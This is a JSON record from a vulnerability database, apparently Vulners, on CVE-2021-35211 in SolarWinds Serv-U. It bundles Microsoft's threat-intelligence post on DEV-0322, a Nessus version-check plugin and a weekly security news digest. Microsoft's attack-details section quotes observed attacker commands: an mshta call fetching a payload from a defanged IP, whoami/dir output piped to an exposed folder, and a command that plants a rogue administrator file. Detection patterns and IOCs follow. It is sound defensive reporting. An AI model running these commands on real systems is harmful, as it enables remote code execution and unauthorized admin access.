"impactScore": 6.0}, "published": "2021-07-13T22:30:17", "type": "mmpc", "title": "Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T22:30:17", "id": "MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2", "href": "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2021-07-27T08:07:52", "description": "Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.\n\nThe vulnerability being exploited is CVE-2021-35211, which was [recently patched by SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>). The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U\u2019s implementation of the Secure Shell (SSH) protocol. If Serv-U\u2019s SSH is exposed to the internet, successful exploitation would give attackers ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker\u2019s follow-on malicious actions. [Microsoft Threat Experts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide>) customers who were affected were notified of attacker activity and were aided in responding to the attack.\n\nMicrosoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.\n\n## Who is DEV-0322?\n\nMSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d or \u201cDEV group\u201d and assigns each DEV group a unique number (DEV-####) for tracking purposes.\n\nMSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.\n\n## Attack details\n\nMSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from _Serv-U.exe_ include:\n\n * _C:\\Windows\\System32\\mshta.exe http://144[.]34[.]179[.]162/a_ (defanged)\n * _cmd.exe /c whoami > "./Client/Common/redacted.txt"_\n * _cmd.exe /c dir > ".\\Client\\Common\\redacted.txt"_\n * _cmd.exe /c ""C:\\Windows\\Temp\\Serv-U.bat""_\n * _powershell.exe C:\\Windows\\Temp\\Serv-U.bat_\n * _cmd.exe /c type \\\\\\redacted\\redacted.Archive > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\redacted.Archive"_\n\nWe observed DEV-0322 piping the output of their _cmd.exe_ commands to files in the Serv-U _\\Client\\Common\\ _folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new [global user](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted_ .Archive _file in the _Global Users_ directory. Serv-U user information is stored in these _.Archive _files.\n\nDue to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, _DebugSocketLog.txt_. The process could also crash after a malicious command was run.\n\nBy reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.\n\nTo protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a [targeted attack notification](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide#microsoft-threat-experts---targeted-attack-notification>), which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.\n\n## Detection guidance\n\nCustomers should review the Serv-U _DebugSocketLog.txt_ log file for exception messages like the line below. A _C0000005; CSUSSHSocket::ProcessReceive_ exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.\n\n`EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5`\n\nAdditional signs of potential compromise include:\n\n * Recent creation of_ .txt_ files in the Client\\Common\\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.\n * _Serv-U.exe_ spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for: \n * _mshta.exe_\n * _powershell.exe_\n * cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line: \n * _whoami_\n * _dir_\n * _./Client/Common_\n * _.\\Client\\Common_\n * _type [a file path] > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\\\[file name].Archive"_\n * Any process with any of the following in the command line: \n * _C:\\Windows\\Temp\\_\n * The addition of any unrecognized [global users](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in _C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users_, which appears to store the Global users information.\n\n\n\n### Detection details\n\n#### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Behavior:Win32/ServuSpawnSuspProcess.A\n * Behavior:Win32/ServuSpawnCmdClientCommon.A\n\n#### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:\n\n * Suspicious behavior by Serv-U.exe\n\n#### Azure Sentinel query\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/DEV-0322_SolarWinds_Serv-U_IOC.yaml>).\n\n### Indicators of compromise (IOCs)\n\n * 98[.]176[.]196[.]89\n * 68[.]235[.]178[.]32\n * 208[.]113[.]35[.]58\n * 144[.]34[.]179[.]162\n * 97[.]77[.]97[.]58\n * hxxp://144[.]34[.]179[.]162/a\n * C:\\Windows\\Temp\\Serv-U.bat\n * C:\\Windows\\Temp\\test\\current.dmp\n\nThe post [Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T22:30:17", "type": "mssecure", "title": "Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T22:30:17", "id": "MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2", "href": "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-07-31T11:40:25", "description": "According to its banner, the installed version of Serv-U is a version prior to 15.2.3 Hotfix 2. It is, therefore, \naffected memory escape vulnerability. An unauthenticated remote attacker who successfully exploited this vulnerability \ncould run arbitrary code with privileges, which could then install programs; view, change, or delete data; or run \nprograms on the affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-15T00:00:00", "title": "Serv-U FTP Server <= 15.2.3 Hotfix 1 Memory Escape Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-15T00:00:00", "cpe": ["cpe:/a:solarwinds:serv-u_file_server"], "id": "SERVU_15_2_3_2.NASL", "href": "https://www.tenable.com/plugins/nessus/151646", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151646);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/30\");\n\n script_cve_id(\"CVE-2021-35211\");\n script_xref(name:\"IAVA\", value:\"2021-A-0322\");\n\n script_name(english:\"Serv-U FTP Server <= 15.2.3 Hotfix 1 Memory Escape Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by an Memory Escape vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the installed version of Serv-U is a version prior to 15.2.3 Hotfix 2. It is, therefore, \naffected memory escape vulnerability. An unauthenticated remote attacker who successfully exploited this vulnerability \ncould run arbitrary code with privileges, which could then install programs; view, change, or delete data; or run \nprograms on the affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ebb78655\");\n # https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-2-3-HotFix-2?language=en_US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1a78dfac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ServU-FTP 15.2.3 Hotfix 2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35211\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:solarwinds:serv-u_file_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"servu_version.nasl\");\n script_require_keys(\"installed_sw/Serv-U\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('ftp_func.inc');\n\nvar port = get_ftp_port(default:21);\n\nvar app_info = vcf::get_app_info(app:'Serv-U', port:port);\n\nvar constraints = [\n {'fixed_version' : '15.2.3.742' , 'fixed_display' : '15.2.3.742 HF2'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). "The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." \nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. \n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
